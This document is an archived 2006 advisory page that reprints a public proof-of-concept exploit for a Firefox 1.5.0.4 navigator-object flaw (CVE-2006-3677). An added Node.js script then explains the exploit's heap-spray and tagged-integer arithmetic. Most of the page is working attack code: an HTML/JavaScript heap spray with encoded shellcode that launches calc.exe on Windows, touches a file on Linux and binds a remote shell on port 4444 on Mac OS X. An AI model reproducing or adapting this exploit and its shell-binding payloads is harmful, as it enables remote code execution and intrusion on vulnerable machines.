
Firefox Javascript navigator Object Code Execution (PoC)

2006-08-11  Author: BitsCN.com  Source: China Network Admin Alliance (中国网管联盟)

Summary
Firefox has been found to contain a vulnerability that allows remote attackers to execute arbitrary code by serving a malicious web page that replaces the 'navigator' object with an attacker-chosen number and then calls into the Java plugin; the Java plugin must be installed for the PoC below to work.
 
Credit:
The information has been provided by Anonymous.
 
 Details
Vulnerable Systems:
 * Firefox version 1.5.0.4

Immune Systems:
 * Firefox version 1.5.0.5

Exploit:
<!--
Firefox <= 1.5.0.4 Javascript navigator Object Code Execution PoC
http://browserfun.blogspot.com/

The following bug (mfsa2006-45) was tested on the Firefox 1.5.0.4 running
on Windows 2000 SP4, Windows XP SP4, and a recently updated Gentoo Linux system.
This bug was reported by TippingPoint and fixed in the latest 1.5.0.5 release of
Mozilla Firefox. This is different from the bug I reported (mfsa2006-48) and is
trivial to turn into a working exploit. The demonstration link below will attempt
to launch "calc.exe" on Windows systems and "touch /tmp/METASPLOIT" on Linux systems.

window.navigator = (0x01020304 / 2);
java.lang.reflect.Runtime.newInstance( java.lang.Class.forName("java.lang.Runtime"), 0);

-->

<html><body><script>

// MoBB Demonstration
function Demo() {

// Exploit for http://www.mozilla.org/security/announce/2006/mfsa2006-45.html
// https://bugzilla.mozilla.org/show_bug.cgi?id=342267
// CVE-2006-3677

// The Java plugin is required for this to work

// win32 = calc.exe
var shellcode_win32 = unescape('%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065');
var fill_win32 = unescape('%u0800');
var addr_win32 = 0x08000800;

// linux = touch /tmp/METASPLOIT (unreliable)
var shellcode_linux = unescape('%u0b6a%u9958%u6652%u2d68%u8963%u68e7%u732f%u0068%u2f68%u6962%u896e%u52e3%u16e8%u0000%u7400%u756f%u6863%u2f20%u6d74%u2f70%u454d%u4154%u5053%u4f4c%u5449%u5700%u8953%ucde1%u8080');
var fill_linux = unescape('%ua8a8');
var addr_linux = -0x58000000; // Integer wrap: 0xa8000000

// mac os x ppc = bind a shell to 4444
var shellcode_macppc = unescape('%u3860%u0002%u3880%u0001%u38a0%u0006%u3800%u0061%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u4800%u000d%u0002%u115c%u0000%u0000%u7c88%u02a6%u38a0%u0010%u3800%u0068%u7fc3%uf378%u4400%u0002%u7c00%u0278%u3800%u006a%u7fc3%uf378%u4400%u0002%u7c00%u0278%u7fc3%uf378%u3800%u001e%u3880%u0010%u9081%uffe8%u38a1%uffe8%u3881%ufff0%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u38a0%u0002%u3800%u005a%u7fc3%uf378%u7ca4%u2b78%u4400%u0002%u7c00%u0278%u38a5%uffff%u2c05%uffff%u4082%uffe5%u3800%u0042%u4400%u0002%u7c00%u0278%u7ca5%u2a79%u4082%ufffd%u7c68%u02a6%u3863%u0028%u9061%ufff8%u90a1%ufffc%u3881%ufff8%u3800%u003b%u7c00%u04ac%u4400%u0002%u7c00%u0278%u7fe0%u0008%u2f62%u696e%u2f63%u7368%u0000%u0000');

var fill_macppc = unescape('%u0c0c');
var addr_macppc = 0x0c000000;

// mac os x intel = bind a shell to 4444
// Thanks to nemo[at]felinemenace.org for shellcode
// Thanks to Todd Manning for the target information and testing
var shellcode_macx86 = unescape('%u426a%ucd58%u6a80%u5861%u5299%u1068%u1102%u895c%u52e1%u5242%u5242%u106a%u80cd%u9399%u5351%u6a52%u5868%u80cd%u6ab0%u80cd%u5352%ub052%ucd1e%u9780%u026a%u6a59%u585a%u5751%ucd51%u4980%u890f%ufff1%uffff%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u5454%u5353%u3bb0%u80cd');
var fill_macx86 = unescape('%u1c1c');
var addr_macx86 = 0x1c000000;


// Start the browser detection
var shellcode;
var addr;
var fill;
var ua = '' + navigator.userAgent;

if (ua.indexOf('Linux') != -1) {
alert('Trying to create /tmp/METASPLOIT');
shellcode = shellcode_linux;
addr = addr_linux;
fill = fill_linux;
}

if (ua.indexOf('Windows') != -1) {
alert('Trying to launch Calculator');
shellcode = shellcode_win32;
addr = addr_win32;
fill = fill_win32;
}

if (ua.indexOf('PPC Mac OS') != -1) {
alert('Trying to bind a shell to 4444');
shellcode = shellcode_macppc;
addr = addr_macppc;
fill = fill_macppc;
}

if (ua.indexOf('Intel Mac OS') != -1) {
alert('Trying to bind a shell to 4444');
shellcode = shellcode_macx86;
addr = addr_macx86;
fill = fill_macx86;
}

if (! shellcode) {
alert('OS not supported, only attempting a crash!');
shellcode = unescape('%ucccc');
fill = unescape('%ucccc');
addr = 0x02020202;
}

var b = fill;
while (b.length <= 0x400000) b+=b;

// Heap spray: keep 36 strings alive in c[], each 4 x (1M chars of fill + shellcode),
// so the address written into navigator lands on fill that slides into shellcode.
var c = new Array();
for (var i =0; i<36; i++) {
c[i] =
b.substring(0, 0x100000 - shellcode.length) + shellcode +
b.substring(0, 0x100000 - shellcode.length) + shellcode +
b.substring(0, 0x100000 - shellcode.length) + shellcode +
b.substring(0, 0x100000 - shellcode.length) + shellcode;
}

if (window.navigator.javaEnabled) {
window.navigator = (addr / 2);
try {
java.lang.reflect.Runtime.newInstance(
java.lang.Class.forName("java.lang.Runtime"), 0
);
alert('Patched!');
}catch(e){
alert('No Java plugin installed!');
}
}
}

</script>

Clicking the button below may crash your browser!<br><br>
<input type='button' onClick='Demo()' value='Start Demo!'>


</body></html>
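The PoC above leans on two pieces of arithmetic that it never spells out: why `window.navigator` is set to `addr / 2` rather than `addr`, and why each target's fill character and address were paired the way they were. The following Node.js script, added here and not part of the original PoC or of the Mozilla bug report, reproduces that arithmetic with the PoC's own constants. The explanation of `addr / 2` is an inference, not something the page states: SpiderMonkey of the Firefox 1.5 era stored a small integer n as the tagged jsval `(n << 1) | 1`, so storing `addr / 2` makes the raw jsval bits `addr | 1`, which is what the PoC's own "Integer wrap: 0xa8000000" comment on the Linux target produces. The spray layout is built with a 0x1000-unit block instead of the PoC's 0x100000 so the demo runs instantly; the function names are this example's own.

```javascript
// Added example (not the original PoC's code): the arithmetic behind the
// navigator overwrite and the heap spray, runnable with `node`.

// (1) Tagged-integer trick. Assumption: SpiderMonkey (Firefox 1.5 era)
// stored integer n as the jsval (n << 1) | 1, so assigning addr / 2 to
// window.navigator leaves raw bits addr | 1, which the vulnerable Java
// plugin path then treats as an object pointer.
function intToJsvalBits(n) {
  // 32-bit shift, viewed as unsigned so the high bit survives.
  return ((n << 1) | 1) >>> 0;
}

// (2) Heap-spray trick. A JS string is a run of 16-bit code units, so a
// string of one repeated unit is, in memory, one repeated 32-bit word. Each
// target's fill was picked so that word is itself an address in or near
// the sprayed region; on x86 the bytes 00 08 also decode to the harmless
// instruction "add byte [eax], cl", so execution slides through the fill.
function fillDword(fillChar) {
  const cu = fillChar.charCodeAt(0);
  // Two consecutive units c,c read as the little-endian dword c | (c << 16).
  return (cu | (cu << 16)) >>> 0;
}

// Build one spray chunk exactly the way the PoC does: double the fill
// until it exceeds blockChars, then concatenate blocksPerChunk copies of
// (blockChars - shellcode.length) fill units followed by the shellcode.
function buildSprayChunk(fill, shellcode, blockChars, blocksPerChunk) {
  let b = fill;
  while (b.length <= blockChars) b += b;
  let chunk = '';
  for (let j = 0; j < blocksPerChunk; j++) {
    chunk += b.substring(0, blockChars - shellcode.length) + shellcode;
  }
  return chunk;
}

// Byte offsets, from the start of the string buffer, at which the shellcode
// sits: once per block, at the end of each fill run, so a jump anywhere
// into the preceding fill slides forward into the shellcode.
function shellcodeByteOffsets(chunk, shellcode) {
  const offsets = [];
  let i = chunk.indexOf(shellcode);
  while (i !== -1) {
    offsets.push(i * 2); // 2 bytes per UTF-16 code unit
    i = chunk.indexOf(shellcode, i + shellcode.length);
  }
  return offsets;
}

// Total bytes the PoC sprays: chunks * blocksPerChunk * blockChars units of
// two bytes each. The target address has to fall inside this much heap.
function sprayBytes(chunks, blocksPerChunk, blockChars) {
  return chunks * blocksPerChunk * blockChars * 2;
}

// Walk the PoC's own (addr, fill) pairs and its spray dimensions.
function demo() {
  const poc = {
    win32:  { addr: 0x08000800,  fill: '\u0800' },
    linux:  { addr: -0x58000000, fill: '\ua8a8' },
    macppc: { addr: 0x0c000000,  fill: '\u0c0c' },
    macx86: { addr: 0x1c000000,  fill: '\u1c1c' },
  };
  const out = {};
  for (const [name, t] of Object.entries(poc)) {
    out[name] = {
      jsvalBits: intToJsvalBits(t.addr / 2).toString(16),
      fillDword: fillDword(t.fill).toString(16),
    };
  }
  // Small-scale layout: 4 blocks of 0x1000 units, 2-unit marker "shellcode".
  const marker = '\ucccc\ucccc';
  const chunk = buildSprayChunk('\u0800', marker, 0x1000, 4);
  out.markerByteOffsets = shellcodeByteOffsets(chunk, marker);
  out.pocSprayBytes = '0x' + sprayBytes(36, 4, 0x100000).toString(16);
  return out;
}

console.log(JSON.stringify(demo(), null, 2));
```

Running it shows the win32 pair is the tidy case: the fill word 0x08000800 equals the target address, so any pointer read from the sprayed region points straight back into it, and the PoC's 36 chunks of 4 x 1M units cover 0x12000000 bytes, comfortably past that address. The Linux pair gives 0xa8000001 for the jsval and 0xa8a8a8a8 for the fill word, which is why that target is marked unreliable in the PoC.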

